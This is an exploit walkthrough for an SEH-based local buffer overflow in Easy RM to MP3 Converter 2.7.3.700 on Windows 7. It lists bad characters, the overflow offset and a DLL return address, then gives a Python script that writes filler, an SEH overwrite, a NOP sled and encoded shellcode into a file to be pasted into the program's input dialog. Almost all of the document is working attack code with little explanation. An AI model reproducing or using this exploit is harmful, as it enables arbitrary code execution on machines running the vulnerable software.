Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH) Walkthrough

(Updated: )
reference Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

badchar

omitted
\x00\x0a

offset

omitted
9012

return address

seh

omitted
# MSRMfilter03.dll 0x1002d619

shellcode

exploit.py

exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# badchar \x00\x0a
shellcode =  b""
shellcode += b"\xda\xc9\xd9\x74\x24\xf4\x5e\xb8\xe8\x22\xd7"
shellcode += b"\xb1\x29\xc9\xb1\x52\x31\x46\x17\x83\xc6\x04"
shellcode += b"\x03\xae\x31\x35\x44\xd2\xde\x3b\xa7\x2a\x1f"
shellcode += b"\x5c\x21\xcf\x2e\x5c\x55\x84\x01\x6c\x1d\xc8"
shellcode += b"\xad\x07\x73\xf8\x26\x65\x5c\x0f\x8e\xc0\xba"
shellcode += b"\x3e\x0f\x78\xfe\x21\x93\x83\xd3\x81\xaa\x4b"
shellcode += b"\x26\xc0\xeb\xb6\xcb\x90\xa4\xbd\x7e\x04\xc0"
shellcode += b"\x88\x42\xaf\x9a\x1d\xc3\x4c\x6a\x1f\xe2\xc3"
shellcode += b"\xe0\x46\x24\xe2\x25\xf3\x6d\xfc\x2a\x3e\x27"
shellcode += b"\x77\x98\xb4\xb6\x51\xd0\x35\x14\x9c\xdc\xc7"
shellcode += b"\x64\xd9\xdb\x37\x13\x13\x18\xc5\x24\xe0\x62"
shellcode += b"\x11\xa0\xf2\xc5\xd2\x12\xde\xf4\x37\xc4\x95"
shellcode += b"\xfb\xfc\x82\xf1\x1f\x02\x46\x8a\x24\x8f\x69"
shellcode += b"\x5c\xad\xcb\x4d\x78\xf5\x88\xec\xd9\x53\x7e"
shellcode += b"\x10\x39\x3c\xdf\xb4\x32\xd1\x34\xc5\x19\xbe"
shellcode += b"\xf9\xe4\xa1\x3e\x96\x7f\xd2\x0c\x39\xd4\x7c"
shellcode += b"\x3d\xb2\xf2\x7b\x42\xe9\x43\x13\xbd\x12\xb4"
shellcode += b"\x3a\x7a\x46\xe4\x54\xab\xe7\x6f\xa4\x54\x32"
shellcode += b"\x3f\xf4\xfa\xed\x80\xa4\xba\x5d\x69\xae\x34"
shellcode += b"\x81\x89\xd1\x9e\xaa\x20\x28\x49\x15\x1c\x33"
shellcode += b"\xd0\xfd\x5f\x33\xe3\x46\xd6\xd5\x89\xa8\xbf"
shellcode += b"\x4e\x26\x50\x9a\x04\xd7\x9d\x30\x61\xd7\x16"
shellcode += b"\xb7\x96\x96\xde\xb2\x84\x4f\x2f\x89\xf6\xc6"
shellcode += b"\x30\x27\x9e\x85\xa3\xac\x5e\xc3\xdf\x7a\x09"
shellcode += b"\x84\x2e\x73\xdf\x38\x08\x2d\xfd\xc0\xcc\x16"
shellcode += b"\x45\x1f\x2d\x98\x44\xd2\x09\xbe\x56\x2a\x91"
shellcode += b"\xfa\x02\xe2\xc4\x54\xfc\x44\xbf\x16\x56\x1f"
shellcode += b"\x6c\xf1\x3e\xe6\x5e\xc2\x38\xe7\x8a\xb4\xa4"
shellcode += b"\x56\x63\x81\xdb\x57\xe3\x05\xa4\x85\x93\xea"
shellcode += b"\x7f\x0e\xa3\xa0\xdd\x27\x2c\x6d\xb4\x75\x31"
shellcode += b"\x8e\x63\xb9\x4c\x0d\x81\x42\xab\x0d\xe0\x47"
shellcode += b"\xf7\x89\x19\x3a\x68\x7c\x1d\xe9\x89\x55"

payload = "A" * (9012 - 4)
payload += "\xeb\x06\x41\x41"
payload += "\x19\xd6\x02\x10"
payload += "\x90" * 16
payload += shellcode

with open("exploit.txt", "w") as fp:
    fp.write(payload)

proof

Batch->Input, paste the content of exploit.txt->OK